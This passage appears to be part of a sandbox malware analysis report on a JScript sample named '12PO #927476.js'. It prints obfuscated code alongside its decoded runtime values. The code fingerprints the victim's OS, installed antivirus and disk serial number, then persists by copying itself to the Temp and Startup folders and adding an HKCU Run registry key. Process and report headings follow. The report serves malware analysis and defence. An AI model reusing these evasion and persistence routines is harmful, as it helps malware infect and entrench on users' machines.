386	_0x400a88 = _0x4c4019[_0x0ada ( '0x62', '\x69\x77\x62\x5d' ) ] ( GetObject, y[0x0] ) [_0x0ada ( '0x63', '\x34\x72\x58\x66' ) ] ( y[0x2] );	_0x0ada("0x62","iwb]") ➔ "ODR" [object Object]._0x44d639( function GetObject(),"winmgmts:") ➔ _0x0ada("0x63","4rXf") ➔ "InstancesOf" InstancesOf("Win32_OperatingSystem") ➔
387	var _0x217589 = new Enumerator ( _0x400a88 );
388	for ( ; ! _0x217589[_0x0ada ( '0x64', '\x61\x32\x55\x47' ) ] ( ) ; _0x217589[_0x0ada ( '0x65', '\x30\x54\x6f\x37' ) ] ( ) )	_0x0ada("0x64","a2UG") ➔ "atEnd" [object Object].atEnd() ➔ false
389	{
390	var _0x522491 = _0x217589[_0x0ada ( '0x66', '\x51\x6b\x56\x6c' ) ] ( );	_0x0ada("0x66","QkVl") ➔ "item" [object Object].item() ➔
391	return _0x522491[_0x0ada ( '0x67', '\x5a\x6b\x40\x49' ) ];	_0x0ada("0x67","Zk@I") ➔ "Caption"
392	break ;
393	}
394	}
395	if ( _0x4c4019['\x66\x59\x42'] ( _0x3c168c, 0x4 ) )	[object Object]._0x391b22(6,4) ➔ false [object Object]._0x391b22(4,4) ➔ true
396	{
397	var _0x57c6cc = _0x0ada ( '0x68', '\x38\x42\x79\x29' ) [_0x0ada ( '0x69', '\x50\x6d\x30\x40' ) ] ( '\x7c' ), _0x5312b3 = 0x0;	_0x0ada("0x68","8By)") ➔ "0\|4\|3\|2\|1" _0x0ada("0x69","Pm0@") ➔ "split" "0\|4\|3\|2\|1".split("\|") ➔ 0,4,3,2,1
398	while (! ! [ ] )
399	{
400	switch ( _0x57c6cc[_0x5312b3 ++] ) {
401	case '\x30' :
402	var _0x123932 = _0x0ada ( '0x6a', '\x7a\x72\x33\x79' );	_0x0ada("0x6a","zr3y") ➔ "winmgmts:\\localhost\root\securitycenter"
403	continue ;
404	case '\x31' :
405	if ( _0x231135 !== '' )
406	{
407	_0x123932 = _0x4c4019['\x42\x73\x43'] ( _0x123932, '\x32' );	[object Object]._0x5e1960("winmgmts:\\localhost\root\securitycenter","2") ➔ "winmgmts:\\localhost\root\securitycenter2"
408	_0x400a88 = GetObject ( _0x123932 ) [_0x0ada ( '0x6b', '\x52\x67\x49\x6e' ) ] ( y[0x3] );	GetObject("winmgmts:\\localhost\root\securitycenter2") ➔ _0x0ada("0x6b","RgIn") ➔ "InstancesOf" InstancesOf("AntiVirusProduct") ➔
409	_0x55386d = new Enumerator ( _0x400a88 );
410	for ( ; ! _0x55386d[_0x0ada ( '0x6c', '\x38\x2a\x37\x69' ) ] ( ) ; _0x55386d['\x6d\x6f\x76\x65\x4e\x65\x78\x74'] ( ) )	_0x0ada("0x6c","8*7i") ➔ "atEnd" [object Object].atEnd() ➔ true
411	{
412	_0x28e074 = _0x55386d[_0x0ada ( '0x6d', '\x72\x2a\x38\x4b' ) ] ( );
413	return _0x28e074['\x44\x69\x73\x70\x6c\x61\x79\x4e\x61\x6d\x65'];
414	}
415	}
416	else
417	{
418	return _0x28e074[_0x0ada ( '0x6e', '\x31\x4d\x40\x5b' ) ];
419	}
420	continue ;
421	case '\x32' :
422	for ( ; ! _0x55386d['\x61\x74\x45\x6e\x64'] ( ) ; _0x55386d[_0x0ada ( '0x6f', '\x61\x32\x34\x74' ) ] ( ) )	[object Object].atEnd() ➔ true
423	{
424	var _0x28e074 = _0x55386d[_0x0ada ( '0x70', '\x61\x57\x6e\x34' ) ] ( );
425	var _0x231135 = _0x28e074[_0x0ada ( '0x71', '\x34\x6b\x6c\x59' ) ];
426	}
427	continue ;
428	case '\x33' :
429	var _0x55386d = new Enumerator ( _0x400a88 );
430	continue ;
431	case '\x34' :
432	_0x400a88 = _0x4c4019[_0x0ada ( '0x72', '\x48\x75\x49\x26' ) ] ( GetObject, _0x123932 ) [_0x0ada ( '0x73', '\x29\x48\x4a\x53' ) ] ( y[0x3] );	_0x0ada("0x72","HuI&") ➔ "ODR" [object Object]._0x44d639( function GetObject(),"winmgmts:\\localhost\root\securitycenter") ➔ _0x0ada("0x73",")HJS") ➔ "InstancesOf" InstancesOf("AntiVirusProduct") ➔
433	continue ;
434	}
435	break ;
436	}
437	}
438	if ( _0x3c168c == 0x6 )
439	{
440	_0x400a88 = GetObject ( y[0x0] ) ['\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x4f\x66'] ( y[0x1] );	GetObject("winmgmts:") ➔ InstancesOf("win32_logicaldisk") ➔
441	var _0x217589 = new Enumerator ( _0x400a88 );
442	for ( ; ! _0x217589[_0x0ada ( '0x74', '\x61\x39\x21\x54' ) ] ( ) ; _0x217589[_0x0ada ( '0x75', '\x38\x2a\x37\x69' ) ] ( ) )	_0x0ada("0x74","a9!T") ➔ "atEnd" [object Object].atEnd() ➔ false
443	{
444	var _0x522491 = _0x217589[_0x0ada ( '0x76', '\x39\x4c\x58\x25' ) ] ( );	_0x0ada("0x76","9LX%") ➔ "item" [object Object].item() ➔
445	return _0x522491[_0x0ada ( '0x77', '\x51\x45\x37\x46' ) ];	_0x0ada("0x77","QE7F") ➔ "volumeserialnumber"
446	break ;
447	}
448	}
449	}
450	function Ns() {	Ns() ➔ undefined
451	var _0x3a6d97 = {
452	'\x61\x56\x4f' : function _0x53d70e(_0x11df0b, _0x4fd8f2) {	[object Object]._0x53d70e("C:\Users\user~1\AppData\Local\Temp","\") ➔ "C:\Users\user~1\AppData\Local\Temp\" [object Object]._0x53d70e("C:\Users\user~1\AppData\Local\Temp\","12PO #927476.js") ➔ "C:\Users\user~1\AppData\Local\Temp\12PO #927476.js" [object Object]._0x53d70e("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\","JUHZ3GDTCR") ➔ "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\JUHZ3GDTCR"
453	return _0x11df0b + _0x4fd8f2;
454	},
455	'\x65\x75\x69' : function _0x556f77(_0x4fe424, _0x57e500) {	[object Object]._0x556f77(function Ex(_0x6ae459),"TEMP") ➔ "C:\Users\user~1\AppData\Local\Temp" [object Object]._0x556f77(function Cr(_0x49b647),2) ➔
456	return _0x4fe424 ( _0x57e500 );	Ex("TEMP") ➔ "C:\Users\user~1\AppData\Local\Temp" Cr(2) ➔
457	},
458	'\x52\x75\x48' : function _0x5dc7a6(_0xe782d, _0x412972) {	[object Object]._0x5dc7a6(""","C:\Users\user~1\AppData\Local\Temp\12PO #927476.js") ➔ ""C:\Users\user~1\AppData\Local\Temp\12PO #927476.js" [object Object]._0x5dc7a6(""C:\Users\user~1\AppData\Local\Temp\12PO #927476.js",""") ➔ ""C:\Users\user~1\AppData\Local\Temp\12PO #927476.js""
459	return _0xe782d + _0x412972;
460	},
461	'\x56\x6d\x71' : function _0x2f672d(_0x245534, _0x2878cf) {	[object Object]._0x2f672d("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup","\") ➔ "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" [object Object]._0x2f672d("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\","12PO #927476.js") ➔ "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js"
462	return _0x245534 + _0x2878cf;
463	}
464	};
465	var _0x4f1b45 = _0x3a6d97[_0x0ada ( '0x78', '\x34\x6b\x6c\x59' ) ] ( _0x3a6d97[_0x0ada ( '0x79', '\x38\x2a\x37\x69' ) ] ( _0x3a6d97[_0x0ada ( '0x7a', '\x30\x54\x6f\x37' ) ] ( Ex, _0x0ada ( '0x7b', '\x73\x35\x4a\x32' ) ), Ch ), wn );	_0x0ada("0x78","4klY") ➔ "aVO" _0x0ada("0x79","8*7i") ➔ "aVO" _0x0ada("0x7a","0To7") ➔ "eui" _0x0ada("0x7b","s5J2") ➔ "TEMP" [object Object]._0x556f77(function Ex(_0x6ae459),"TEMP") ➔ "C:\Users\user~1\AppData\Local\Temp" [object Object]._0x53d70e("C:\Users\user~1\AppData\Local\Temp","\") ➔ "C:\Users\user~1\AppData\Local\Temp\" [object Object]._0x53d70e("C:\Users\user~1\AppData\Local\Temp\","12PO #927476.js") ➔ "C:\Users\user~1\AppData\Local\Temp\12PO #927476.js"
466	try
467	{
468	fs['\x43\x6f\x70\x79\x46\x69\x6c\x65'] ( fu, _0x4f1b45, ! ! [] );	CopyFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js","C:\Users\user~1\AppData\Local\Temp\12PO #927476.js",true) ➔ undefined
469	}
470	catch ( _0x2ba7d6 )
471	{
472	}
473	try
474	{
475	sh[_0x0ada ( '0x7c', '\x5a\x6b\x40\x49' ) ] ( _0x3a6d97[_0x0ada ( '0x78', '\x34\x6b\x6c\x59' ) ] ( g[0x0] + g[0x3], _0x0ada ( '0x7d', '\x43\x70\x57\x35' ) ), _0x3a6d97[_0x0ada ( '0x7e', '\x43\x69\x4e\x28' ) ] ( _0x3a6d97[_0x0ada ( '0x7f', '\x35\x47\x33\x73' ) ] ( '\x22', _0x4f1b45 ), '\x22' ), g[0x5] );	_0x0ada("0x7c","Zk@I") ➔ "RegWrite" _0x0ada("0x78","4klY") ➔ "aVO" _0x0ada("0x7d","CpW5") ➔ "JUHZ3GDTCR" [object Object]._0x53d70e("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\","JUHZ3GDTCR") ➔ "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\JUHZ3GDTCR" _0x0ada("0x7e","CiN(") ➔ "RuH" _0x0ada("0x7f","5G3s") ➔ "RuH" [object Object]._0x5dc7a6(""","C:\Users\user~1\AppData\Local\Temp\12PO #927476.js") ➔ ""C:\Users\user~1\AppData\Local\Temp\12PO #927476.js" [object Object]._0x5dc7a6(""C:\Users\user~1\AppData\Local\Temp\12PO #927476.js",""") ➔ ""C:\Users\user~1\AppData\Local\Temp\12PO #927476.js"" RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\JUHZ3GDTCR",""C:\Users\user~1\AppData\Local\Temp\12PO #927476.js"","REG_SZ") ➔ undefined
476	}
477	catch ( _0x553ee3 )
478	{
479	}
480	try
481	{
482	var _0x4b2e88 = _0x3a6d97[_0x0ada ( '0x80', '\x5a\x6b\x40\x49' ) ] ( Cr, 0x2 );	_0x0ada("0x80","Zk@I") ➔ "eui" [object Object]._0x556f77(function Cr(_0x49b647),2) ➔
483	fs[_0x0ada ( '0x81', '\x31\x47\x29\x41' ) ] ( fu, _0x3a6d97[_0x0ada ( '0x82', '\x61\x57\x6e\x34' ) ] ( _0x3a6d97['\x56\x6d\x71'] ( _0x4b2e88[_0x0ada ( '0x83', '\x5a\x6b\x40\x49' ) ] ( 0x7 ) ['\x53\x65\x6c\x66'][_0x0ada ( '0x84', '\x5a\x61\x23\x4f' ) ], '\x5c' ), wn ), ! ! [] );	_0x0ada("0x81","1G)A") ➔ "CopyFile" _0x0ada("0x82","aWn4") ➔ "Vmq" _0x0ada("0x83","Zk@I") ➔ "NameSpace" NameSpace(7) ➔ Startup _0x0ada("0x84","Za#O") ➔ "Path" [object Object]._0x2f672d("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup","\") ➔ "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" [object Object]._0x2f672d("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\","12PO #927476.js") ➔ "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js" CopyFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js","C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js",true) ➔ undefined
484	}
485	catch ( _0x4321da )
486	{
487	}
488	}

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

Boot Survival:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Lowering of HIPS / PFW / Operating System Security Settings:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: wscript.exe PID: 3376 Parent PID: 3000

General

Chronological Activities

Analysis Process: explorer.exe PID: 3492 Parent PID: 2920

General

Chronological Activities

Analysis Process: explorer.exe PID: 3552 Parent PID: 2920

General

Chronological Activities

Analysis Process: explorer.exe PID: 3568 Parent PID: 516

General

Chronological Activities

Analysis Process: explorer.exe PID: 3616 Parent PID: 516